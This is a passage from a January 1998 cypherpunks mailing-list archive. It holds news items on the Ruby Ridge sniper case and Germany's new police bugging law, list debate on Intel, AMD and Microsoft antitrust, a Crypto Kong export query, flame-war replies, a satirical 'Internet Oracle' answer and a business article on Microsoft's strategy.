using a gun in a reckless manner by firing through the front door of
Weaver's house without first determining whether anyone other than his
intended target was behind the door. Horiuchi could face up to 10 years in
prison if convicted.
       
The standoff began Aug. 21, 1992, when U.S. Marshals approached Weaver's
cabin to arrest him for failing to appear in court on gun charges. U.S. 
Marshal William Degan and Weaver's 14-year-old son Sammy were killed in a
gun battle near the cabin, and the Federal Bureau of Investigation was
called in later that day.

The next day, Horiuchi wounded Weaver and Harris and killed Vicki Weaver. 
Weaver and Harris surrendered 10 days later and were acquitted of murder
charges in the killing of Degan in a 1993 federal trial.

Weaver said in a telephone interview from his home in Montana that he was
pleased by Harden's ruling. 
   
``It's taken a long time, but sometimes the wheels of justice grind
slowly. We are looking to see some justice in all of this,'' Weaver said. 
``To be honest I hope that he (Horiuchi)  eventually sees that he is just
one of two scapegoats and that eventually he will tell the whole truth.''

Horiuchi's lawyers were due to appear next Monday before a federal judge
in Boise to ask that the case against the FBI sniper be moved to federal
court. 
        
Horiuchi was scheduled to be arraigned Friday, Feb. 13, in Idaho district
court in Boundary County, but that could change if his case is remanded to
federal court. 
         
Neither Horiuchi's lawyers nor Woodbury were immediately available for
comment on Harden's ruling. 



16)From: SpyKing@thecodex.com
Subject: Germany to restore bugging  
                        
Thursday January 8, 1:58 PM GMT

Germany to restore bugging banned since Nazi-era

BONN, Jan 8 (Reuters) - German political leaders agreed on Thursday to
allow police to bug apartments of suspected criminals, restoring a
crime-fighting tool banned since abuses by the secret police in the Nazi
era.

Leaders from Chancellor Helmut Kohl's centre-right coalition and the
opposition Social Democrats (SPD) said they had reached a deal allowing
police to plant microphones in private homes of suspected criminals for
the first time since 1945. 

Both houses of parliament are now expected to quickly pass the
long-debated measure, which police have argued was needed to better fight
organised crime and bring the country in line with other nations that
allow electronic surveillance. 

Germany, which reacted to the Gestapo's abuses with some of the Western
world's most extensive civil liberties laws, has long resisted any
relaxation in constitutional protections that have kept police out of
private homes.

Interior Minister Manfred Kanther said the agreement would give police the
necessary tool to fight organised crime.

"This is a decisive step towards more effectively fighting crime," Kanther
said. "We can now keep surveillance on suspected gangster apartments and
we will be able to better fight money laundering." 

The opposition SPD, which controls the upper house of parliament, the
Bundesrat, said it would support the measure after the government agreed
to partial exemptions for some professional groups such as priests,
attorneys and journalists. 

Police will be required to obtain advance court permission for any
surveillance.

Previously, police were only given rare exemptions to the constitutional
law protecting the private home. They were allowed to use listening
devices or electronic surveillance only with court permission if there was
concrete evidence that a serious crime was about to take place. 

Now authorities will have the power to use eavesdropping methods far more
extensively and will also for the first time be able to bug apartments
after a crime has been committed to obtain evidence.

Germany's post-war constitution barred police from electronic
surveillance, telephone taps and intercepting mail. The bans on telephone
taps and mail intercepts were relaxed in the 1970s amid a wave of
left-wing guerrilla attacks. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Sat, 10 Jan 1998 05:42:24 +0800
To: cypherpunks@toad.com
Subject: Germany not so worried about Gestapo wiretaps now
Message-ID: <3.0.5.32.19980109131833.007b0bd0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain




There are several examples of sacrificing liberty for
security in a G7 country in the article below.
Also the justification of "getting in line with other countries"
is used for allowing civilian SIGINT practices previously banned.


Thursday January 8 11:32 AM EST 

Germany to Restore Surveillance

BONN, Germany (Reuters) - German political leaders agreed Thursday to allow
police to bug
apartments of suspected criminals, restoring a crime-fighting tool banned
since abuses by the secret police
in the Nazi era. 

Leaders from Chancellor Helmut Kohl's center-right coalition and the
opposition Social Democrats
(SPD) said they had reached a deal allowing police to plant microphones in
private homes of suspected
criminals for the first time since 1945. 

Both houses of parliament are now expected to quickly pass the long-debated
measure, which police
have argued was needed to better fight organized crime and bring the
country in line with other nations
that allow electronic surveillance. 

Germany, which reacted to the Gestapo's abuses with some of the Western
world's most extensive civil
liberties laws, has long resisted any relaxation in constitutional
protections that have kept police out of
private homes. 

Interior Minister Manfred Kanther said the agreement would give police the
necessary tool to fight
organized crime. 

"This is a decisive step toward more effectively fighting crime," Kanther
said. "We can now keep
surveillance on suspected gangster apartments and we will be able to better
fight money laundering." 

The opposition SPD, which controls the upper house of parliament, the
Bundesrat, said it would support
the measure after the government agreed to partial exemptions for some
professional groups such as
priests, attorneys and journalists. 

Police will be required to obtain advance court permission for any
surveillance. 

Previously, police were only given rare exemptions to the constitutional
law protecting the private home.
They were allowed to use listening devices or electronic surveillance only
with court permission if there
was concrete evidence that a serious crime was about to take place. 

Now authorities will have the power to use eavesdropping methods far more
extensively and will also for
the first time be able to bug apartments after a crime has been committed
to obtain evidence. 

Germany's post-war constitution barred police from electronic surveillance,
telephone taps and
intercepting mail. The bans on telephone taps and mail intercepts were
relaxed in the 1970s amid a wave
of left-wing guerrilla attacks. 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Sat, 10 Jan 1998 03:15:48 +0800
To: Tim May <tcmay@got.net>
Subject: Re: In God We Antitrust, from the Netly News
In-Reply-To: <v03102800b0dc148aaea5@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980109135333.7152B-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 9 Jan 1998, Tim May wrote:

> The next such battle will be about Intel, which, if anything, has even more
> of a commanding presence in the market than MS has. Besides
> "investigations" (a DC codeword meaning: "donate money to the ruling
> party"), the antitrust buzz is that the Intel-DEC deal may be scotched.
> 
> Intel's failed competitors (Cyrix, AMD, Motorola, Sun, SGI/MIPS,
> Intergraph) can be counted on to run crying to Mother Government, crying
> that Intel is too successful.

Failed? AMD is farfrom a failed competitor.  Intel is nowhere near being a
monopoly.  In this industry,Intel creates a chip, then AMD,Cyrix, etc take
the published specs on that chip and duplicate the work.  They same some
effort from having to make opcode decisions, but then they don't get first
crack at the market.  AMD has a *Very* good chip in the K6, receiving much
attention as being a serious competitor to Intel's chips.

Intel is in no way nearly as hated as Microsoft.  Many people hate MS
products irrationally, some of those also hate the 80x86line of chips.
The number hating the chips is muhc lower than the number hating MS.
Maybe because Intel tends to have more reliable produts?  Who knows. 

Intel is *not* in any danger of being a target for an antitrust suit in
the near futur, in truth they don't even have the signs going for them.
(No dumping of products, no tying of products, though Slot-1 might
cqualify as this, I doubt it.)

Even the industry mags point out this difference between the two.  It's a
lot easier to develop competing hardware than a competing OS.  

Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 10 Jan 1998 06:15:26 +0800
To: David Honig <cypherpunks@toad.com
Subject: Re: Germany not so worried about Gestapo wiretaps now
In-Reply-To: <3.0.5.32.19980109131833.007b0bd0@206.40.207.40>
Message-ID: <v03102801b0dc4d932c32@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:18 PM -0800 1/9/98, David Honig wrote:
>There are several examples of sacrificing liberty for
>security in a G7 country in the article below.
>Also the justification of "getting in line with other countries"
>is used for allowing civilian SIGINT practices previously banned.

>Germany, which reacted to the Gestapo's abuses with some of the Western
>world's most extensive civil
>liberties laws, has long resisted any relaxation in constitutional
>protections that have kept police out of
>private homes.
...

I suspect this is only a cosmetic change, in terms of realpolitik.

The BND and other intelligence/law enforcement agencies have very probably
been using the available SIGINT and COMINT tools....maybe just not using
the captured data in courtrooms.

(As with the U.S., where illegal wiretaps and bugs are used for ancillary
purposes, even if not sanctioned by the courts.)

But this still signals a move toward a '1984' situation, with Germany
likely now to relax some of its objections to OECD plans for crypto
restrictions (recall that Germany was opposed to some of the key escrow
plans).

And now that Japan has fallen into line (e.g., by banning the export of the
RSA chip so touted by Bidzos and NTT), the OECD/New World Order is set to
make some moves in '98.

(Things have been quiet on the crypto legislation/international agreements
front, from a news point of view, but we can safely assume that all of
these bad things are moving along behind the scenes, and will once again
become cause celebres.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 10 Jan 1998 03:40:01 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Microsoft Windows98 - Make your own decision.
Message-ID: <v0400391eb0dc26601b5e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: jnoble@pop.dgsys.com
Mime-Version: 1.0
Date:         Fri, 9 Jan 1998 13:09:13 -0400
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: John Noble <jnoble@DGSYS.COM>
Subject:      Re: Microsoft Windows98 - Make your own decision.
To: CYBERIA-L@LISTSERV.AOL.COM

At 10:22 AM -0600 1/9/98, Virginia Metze wrote:
>Those are the Fortune 500 figures which they identify as total revenues and
>which I take to mean gross.  Incidentally, Microsoft is 172, IBM #6.
>Destruction of Microsoft's Word revenues, which accounts for a lot of their
>profit, is what
>would really seriously damage them, and note the push of IBM into the
>desktop applications market...
>
>And IBM is going to be way out in front of everyone no matter how it
>is measured.
>

I share Virginia's sentiment about MS-bashing, but if I were going to
measure market power I'd look at profit margins. These figures are provided
by Hoovers Stockscreener http://www.stockscreener.com which is a lot of fun
to play with.


Market Value (mils.):

General Electric Company        243000.0
The Coca-Cola Company           164792.0
Microsoft Corporation           157473.0
Exxon Corporation               146881.0
Nippon Telegraph and Telephone  135252.0
Merck                           127673.0
Intel                           121575.0
Philip Morris Companies Inc.    112867.0
Royal Dutch Petroleum Company   112039.0
The Procter & Gamble Company    108281.0
Toyota Motor Corporation        105326.0
IBM                             102912.0


Revenues (mils) (for mkt caps over 100 bil):

 Exxon Corporation             119507.0
 Toyota Motor Corporation       98740.6
 General Electric Company       86658.0
 Royal Dutch Petroleum Company  85784.7
 IBM                            77928.0
 Philip Morris Companies Inc.   71512.0
 Nippon T & T                   71262.4
 AT&T Corp.                     52839.0
 The Procter & Gamble Company   36216.0
 Intel Corporation              25003.0
 Merck & Co., Inc               22810.9
 The Coca-Cola Company          18610.0
 Microsoft Corporation          12193.0
 Pfizer Inc                     12169.0

PROFIT MARGIN (for mkt caps over 100 bil.):

 Microsoft Corporation          30.4%
 Intel Corporation              24.7%
 Merck & Co., Inc.              19.6%
 The Coca-Cola Company          18.8%
 Pfizer Inc                     17.1%
 AT&T Corp.                     11.0%
 The Procter & Gamble Company   9.5%
 General Electric Company       9.3%
 Philip Morris Companies Inc.   9.1%
 IBM                            7.1%
 Royal Dutch Petroleum Company  6.9%
 Exxon Corporation              6.4%
 Toyota Motor Corporation       3.2%
 Nippon T & T                   2.9%





John Noble

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 10 Jan 1998 04:21:44 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: In God We Antitrust, from the Netly News (fwd)
Message-ID: <199801092045.OAA10031@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 9 Jan 1998 12:11:44 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: In God We Antitrust, from the Netly News

> There have been reliable reports, from several kinds of sources, that AMD's
> Fab 25 in Austin is yielding only a handful of workingn (at speed) K6s per
> 8-inch wafer, versus well over 100 working (at full rated speed,
> importantly) Pentium IIs (and variamts) devices per 8-inch wafer. Intel is
> running at a nearly perfect yield rate (most die are functional, a very
> nice position to be in, and a very hard one to arrange).

> Intel also has about an order of magnitude more clean room space capable of
> making the Pentia (and Merced and Gunnison, etc.) than AMD has in Fab 25.

>From my contacts at AMD and personal experience working on the Semiconductor
Technology program through Austin Community College 2 years ago I would have
to agree with these claims.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 10 Jan 1998 07:04:32 +0800
To: cypherpunks@cyberpass.net
Subject: Has anyone exported Crypto Kong yet?
Message-ID: <199801092257.OAA21085@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
It seems likely that the current release candidate 

http://www.jim.com/jamesd/Kong

is going to be the actual release 1.0.

Being a good respectable law abiding American resident alien
I intend to set up two buttons, one that you click on if you
are are a US or canadian citizen, and one that you click on
if you are not.

It would be nice if the non citizen link led somewhere.



    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     7kglYb5GYi3VEyvppMeDd0zlnuKkh/uYzEXVxIl1
     4uDBDw9n+6DVIw9foYasgSkcQcPEt7kui6qxpfkfc
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Fri, 9 Jan 1998 21:38:34 +0800
To: mikhaelf@mindspring.com
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <3.0.16.19980101170044.0dff4600@pop.mindspring.com>
Message-ID: <199801091545.PAA01120@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Mikhael Frieden wrote:

> >You clearly have no comprehension of the principles of the free market 
> >and the rights of businesses and individual to hire and fire whoever the 
> >fuck they like for any reason whatsoever. I am no racist, but I defend 
> >your right to be as racist as you see fit.

>         You are obviously an evil person if you do so against the self
> annointed, even though they self identify themselves as 30% racist. 

This reminds me of the self-righteous political leaders of India 
who enforced 47% reservations for Schedule Cast/Tribe groups 
in all government subsidized institutions couple of years back. 
And, it all starts with the same fallacious interpretation of 
"equal opportunity".  

Whatever your political philosophy might be you won't like
to see a doctor who is likely to kill you with an overdose of 
codeine. Or would you? 

Best, 
Vipul 

-- 
"So Beck was the hacker and Oda was the backer. The oldest and 
most troublesome relationship in the technological world." 

                            -- "Diamond Age", Neal Stephenson. 

==================================================================
Vipul Ved Prakash                 | - Electronic Security & Crypto 
mail@vipul.net                    | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 9 Jan 1998 23:28:42 +0800
To: cypherpunks@cyberpass.net
Subject: Cute
Message-ID: <199801091520.QAA29876@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May is cute and cuddly!

         (_) _____ (_)
            /O   O\   Timmy C[uddly] May
           !   I   !
           ! \___/ !
            \_____/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Tue, 13 Jan 1998 03:39:17 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: cypherpunks and guns
In-Reply-To: <199801081855.TAA05464@basement.replay.com>
Message-ID: <Pine.LNX.3.91.980109162329.724A-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> Tim May doesn't know anything about Onion Routers, Crowds, or any of
> the other new privacy technologies like Adam Back's prototype Eternity
> service. 

Judging Tim May in this way seems rather unfair as I have no reason to 
believe you know any of this to be true, although your anonymity prevents 
me from knowing either way.

> In truth, he has lost all interest in cryptography and now spends
> his time talking about guns and making racist comments.

True, Tim spends little time posting about crypto now, but maybe he feels 
he has said what he wants to, and moved on, maybe he`ll post about crypto 
again in the future, maybe not. If you don`t like his writing killfile 
him, or use the delete key, if you don`t like the content on the list 
now, write something yourself, start a thread you find interesting, do 
something to change the situation rather than bemoaning the state of the 
list.

> He wonders why the cypherpunks list no longer attracts quality
> cryptographic ideas.  He need look no farther than the nearest mirror.

People who have something to say about crypto will post here, look at the 
number of good cryptographers on the list and tell me where else you will 
find such an accumulation of talented thinkers and writers. Cypherpunks 
was never intended to be a pure crypto list anyway (as I see it), more of 
an applied crypto list discussing applications of technology as a defence 
of personal freedom, related issues will inevitably be discussed and that 
includes guns and "anti-discrimination" laws. If you don`t like the list, 
change it or leave, sci.crypt and sci.crypt.research are excellent groups 
on a more pure cryptography topic than cpunx, apart from the massive 
number of "where do I get PGP for my PC" questions on sci.crypt 
(sci.crypt.research is moderated and much lower traffic).

> His violent rants and his off-topic, offensive posts have done more than
> anything to drive good people off the list.

"good people" as you see them presumably have the level of technical 
competence required to set up procmail, and put those who they see as 
"ranting" in their killfile. 

> The single best thing that could happen to the cypherpunks list (and the
> cypherpunks movement, for that matter) would be for Tim May to leave the
> list and disassociate himself from the cypherpunks. 

Oh worthy anonymous one, please enlighten us with your next pronouncement 
on the best thing we can do for the movement.

> He would be much more comfortable joining the KKK and the local 
> militia.  

How do you know Tim isn`t already a member of his local militia?
Why do you feel Tims predisposition towards active methods of preserving 
his freedom rule out his participation in this group?


> After him, Paul Bradley, William Geiger and Dimitri Vulis can follow.

Never let it be said that I post in my own defence against a silly 
flamebait message such as this, but I cannot see the writers problem with 
ignoring me if he doesn`t like what I post.

> This will leave fine thinkers with good hearts like Adam Back, Bill
> Stewart, Wei Dai and others, people who still believe that cryptography
> can make a strong contribution to our freedom.

I still believe cryptography can make a contribution to freedom, but I am 
gradually persuaded more and more to the belief that other means of 
defence may become necessary as a last resort, and I believe in being 
prepared for all possible outcomes.

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Tuliper" <frisbee@pop.iuinc.com>
Date: Sat, 10 Jan 1998 06:21:24 +0800
To: cypherpunks@toad.com
Subject: SSL DLL's?
Message-ID: <199801092207.OAA09121@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone know if there is a SSL winsock type control out there and what 
the name of it is?
Thanks,...
Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Fri, 9 Jan 1998 21:35:42 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: oracle on feds (fwd)
Message-ID: <199801091711.RAA01466@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



 Selected-By: David Bremner <bremner@cs.mcgill.ca>

 The Internet Oracle has pondered your question deeply.
 Your question was:

 > DearOralemostwisepleasetellme...
 >
 > Look, I'm sorry to rush this, but the IRS, BATF, IRS, CIA, INS, IMF and
 > CFR agents (not to mention the black helicopters) are at my front door.
 > What should I do?

 And in response, thus spake the Oracle:

                        ENTERTAINING FEDERAL AGENTS
                           with MARTHA STEWART

 Hello, I'm Martha Stewart, welcome to my answer.  Our good friend The
 Internet Oracle is not able to answer your question right now, and so
 he has asked me to try to help.  Let's take a look at your situation,
 shall we?

 Entertaining large groups of Federal agents is always a bit of a
 challenge, especially when we're pressed for time.  Of course, it's
 always best to be prepared for visitors.  You should have a neatly
 trimmed and freshly painted entryway, with a large Welcome mat and
 perhaps some cut flowers.  A wooden rocking chair on the porch adds a
 homey touch of camouflage.

 When Federal agents are expected, I like to take a little time
 beforehand and knit a large Plywood Cozy for each window to catch some
 of the broken glass.  Don't forget to save the shards!  They can be
 dyed later and arranged into a stunning stained glass mosaic.

 For autumn, have plenty of hot mulled cider ready.  Not only is it
 healthy and aromatic, it's better than water for extinguishing fires!
 If your electricity is sabotaged, use your supply of flares in tasteful
 candle holders.

 Finally, don't be afraid to think creatively.  Although many people
 think of large-caliber bullets as merely a nuisance, they can be
 recovered and used as decorative accessories and paper weights, or
 hammered into distinctive buttons.  With a little brown paint, a smoke
 grenade can also be fashioned into a quaint pineapple arrangement!

 As always, remember to be courteous and kind, and just relax and be
 yourself.  It takes only a small extra effort to be remembered for your
 own unique style of entertaining.  Enjoy!

 You owe the Oracle a throw rug woven from yellow "Police Line" tape.

-- 
"So Beck was the hacker and Oda was the backer. The oldest and 
most troublesome relationship in the technological world." 

                            -- "Diamond Age", Neal Stephenson. 

==================================================================
Vipul Ved Prakash                 | - Electronic Security & Crypto 
mail@vipul.net                    | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Galt <jongalt@everest.pinn.net>
Date: Sat, 10 Jan 1998 06:50:16 +0800
To: Anonymous <anon@anon.efga.org>
Subject: Re: your mail
In-Reply-To: <0af1f50d709c70d6ee98863386f81e59@anon.efga.org>
Message-ID: <Pine.SUN.3.91.980109172923.24415C-100000@everest.pinn.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 22 Dec 1997, Anonymous wrote:

> >> I also wouldn't trust Lance Cottrell.  He's selling privacy for the 
> >$$, not
> >> for the ideology; he'll bend over the moment he thinks there's more 
> >$$ in
> >> bending over, which is usually the case.
> >What is wrong selling privacy for money?
> 
> It usually involves making it shitty.

Oh yeah, that's the way free enterprise works... if you make your product 
shitty, your customers will pay more for it!  Hey maybe if I do a crappy 
job, my employer will pay me more!

______________________________________________________________________
Jon Galt
e-mail:  jongalt@pinn.net
website:  http://www.pinn.net/~jongalt/
PGP public key available on my website.
Democracy is two wolves and a sheep voting on what to have for dinner.
______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 10 Jan 1998 07:52:43 +0800
To: cypherpunks@toad.com
Subject: Microsoft's Future 2/2
Message-ID: <a78a32a4824cdd9a10d583ccbd2252dd@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




         Chances are it's a safe bet. While Microsoft concedes that Windows
         NT servers won't replace the world's supply of mainframe computers
         anytime soon, Jeffrey S. Raikes, Microsoft's group vice-president for
         sales and marketing, predicts that in the next few years, NT could
         unseat IBM's stalwart AS/400 minicomputer--a $3.4 billion annual
         business. By selling NT, Office 97, and a suite of networking software
         called BackOffice, Raikes' goal is to increase Microsoft's average
         annual revenues per corporate computer user from less than $150
         today to more than $200 in the next two years.

         Analysts like what they see. They predict the software maker will sell $5
         billion worth of NT and BackOffice by 2000, double what's expected
         this fiscal year. ''Today, we see Microsoft software at the heart of
         almost every desktop,'' says analyst Neil Herman of Salomon Smith
         Barney. ''In 10 years, we'll see Microsoft software at the heart of 90% of
         the servers out there, too.''

         One company already feeling the heat is Netscape. On Jan. 5, the
         Silicon Valley highflier announced that its quarterly sales would be $125
         million to $130 million--well below the $165 million analysts had
         expected. Worse, it will report its first loss in nine quarters. The reason:
         Netscape's server and browser sales are down because of stiff
         competition from Microsoft and IBM (page 69). ''Microsoft is the
         primary cause of Netscape's problems,'' says analyst Bruce D. Smith of
         Merrill Lynch & Co.

         That doesn't mean Microsoft will own enterprise. The operating system
         accounts for just 20% of the installed base of computer servers. And for
         the rest of that business Microsoft faces a revitalized IBM that is well
         entrenched in Corporate America and becoming a formidable
         competitor on the Net. After stumbling in the early '90s, IBM has made
         a remarkable comeback by using PC technology to sell mainframe
         computers costing less than one-tenth what customers paid in the late
         1980s. That has kept many major customers true blue.

         Database giant Oracle also has an incredibly loyal following. It has 39%
         of that sector, vs. less than 4% for Microsoft's SQL Server. Microsoft's
         database software is still seen as not powerful enough to handle the
         really big jobs at giant corporations. ''Microsoft has given their
         database away, but it hasn't helped--because their database isn't any
         good,'' says Oracle's Ellison.

         And then there's Java. Sun Microsystems' much hyped programming
         language offers the prospect of an alternative to Windows, since
         applications written in it can run on any operating system. So far,
         Microsoft has convinced hundreds of corporate customers that they can
         save money by running even their biggest jobs on NT. But many
         companies still have millions invested in mainframes, and moving
         everything to Windows could take years. Java offers an alternative. This
         software--used to write other programs--runs on a variety of computer
         architectures. That helps it to act as a digital glue for creating programs
         that allow companies to use existing software, such as mainframe
         programs, while still tapping into new Internet businesses.

         Early this year, Java will get better yet. Improved security and
         performance could make it more appealing to use on a slew of
         devices. ''Between Java cards and Java rings and Java phones and
         Java set-top boxes and Java everything else, we're going to destroy
         them on unit volume,'' predicts Sun CEO Scott G. McNealy. For all this,
         analysts don't see Java replacing Windows anytime soon. The 700,000
         software developers using Java pales next to the 4.5 million that
         Windows claims. Even John F. Andrews, chief information officer for
         transportation giant CSX Corp. and a huge Java fan, says: ''Java's a
         punch, but it's not a knockout.''

         That's because Microsoft is well protected. Many corporations have
         already standardized on Windows and its desktop applications. So
         now, they're interested in buying software from Microsoft that can help
         tie their computer systems together more simply and run their large
         databases, accounting systems, and manufacturing operations. ''The
         plan ultimately is to run everything on one platform. That's the carrot out
         there,'' says Dean Halley, an information-systems executive at Credit
         Suisse First Boston Corp.

         THE INTERNET
         When it comes to new markets, none is as vast and potentially lucrative
         as the Internet. Analysts predict that Net revenues from software and
         commerce will reach dizzying heights--as much as $100 billion by
         2000. And no single company is investing so much or so broadly--or
         holds as many of the pieces--as Microsoft. In the two years since it
         vowed to become a leader in cyberspace, Microsoft has been true to
         its word.

         The most visible proof is Internet Explorer. Since releasing the first
         version of IE a little more than two years ago, Microsoft has jetted from
         zero to 40% of the market. Moreover, if the software maker's plans to
         weave the browser into Windows 98 go unhampered by the Justice
         Dept., analysts expect IE to shoot past market leader Netscape to
         become No.1 this year.

         Microsoft's browser has one huge draw: It's free. Cash-rich Microsoft
         can afford such tactics, while scrappy rivals such as Netscape have to
         charge a few dollars. And that can make a difference. Internet service
         provider Concentric Network Corp., for example, switched from
         Netscape's browser to IE over price. ''We're operating on slim margins,
         so it matters,'' says Vice-President James Isaacs.

         That has sent Netscape looking for more lucrative server business. ''If I
         had to depend on the browser for profits, I'd be flat-ass broke,'' says
         Netscape CEO James L. Barksdale. In the face of a loss for the
         quarter, Netscape may be forced to match Microsoft's giveaway
         strategy.

         Internet Explorer is just the tip of the iceberg. Across the board,
         Microsoft is making the Net its No.1 priority. ''It's hard to think of much
         that we're doing that isn't influenced by the Internet,'' says Gates. ''All of
         our software is very tied up in helping people use the Internet in a better
         way.''

         That includes deep-pocketed corporate customers. As they refashion
         their businesses around the Internet, Microsoft is out to make sure that
         Windows NT will be the software of choice. In the past few months,
         Microsoft has updated all of its corporate software to boost the latest
         Internet features. BackOffice, for example, now includes Commerce
         Server, specialized software that companies such as Barnes & Noble
         Inc. and Dell Computer Corp. use to run their online sales operations.

         As it does in the browser market, Microsoft gives away much of its
         basic Internet server software. It packages Internet programs, such as
         Site Server for managing Web sites, with BackOffice at no additional
         cost. And each copy of NT includes Internet Information Server, a basic
         Web-server program. That has helped catapult Microsoft's share of
         Web and corporate intranet servers to 55%, with all rival Unix makers
         combined at No.2, with a 36% share.

         The Net initiatives that draw the most attention, though, are Microsoft's
         attempts at building new Web-style businesses. It has set up 16 Web
         sites for everything from online investing to travel reservations to home
         buying.

         Some of these Web sites are already leaders in their categories.
         Microsoft's Expedia is in a dead heat with Preview Travel and
         Travelocity for the top spot in online travel, with more than $2 million in
         bookings a week. CarPoint has quickly become a popular spot for car
         buyers. This year, CarPoint is expected to begin offering insurance and
         financing services that will make it a one-stop shop for auto needs.
         Forrester Research Inc. predicts that CarPoint will rack up sales of $10
         million a month within a couple of years. MSNBC, Microsoft's news
         venture with NBC, ranks third--after Softbank's news site ZDNet, and
         Walt Disney's site--in the most recent PC Meter Survey of Web-site
         viewership in the news, information, and entertainment category.

         Microsoft plans to launch a couple of new sites this year. One,
         code-named Boardwalk, will let home buyers shop for real estate and
         mortgages. The other is an online bill-paying service that will be
         operated as a joint venture with First Data Corp. ''There will be three or
         four major networks on the Internet, and we expect to be one of them,''
         says Jeff Sanderson, general manager for Microsoft Network, the
         software giant's online service. By some measures, Microsoft is
         already there. PC Meter rates Microsoft's 16 Web sites combined as
         No.4 in its monthly survey--behind only America Online, Yahoo!, and
         Netscape.

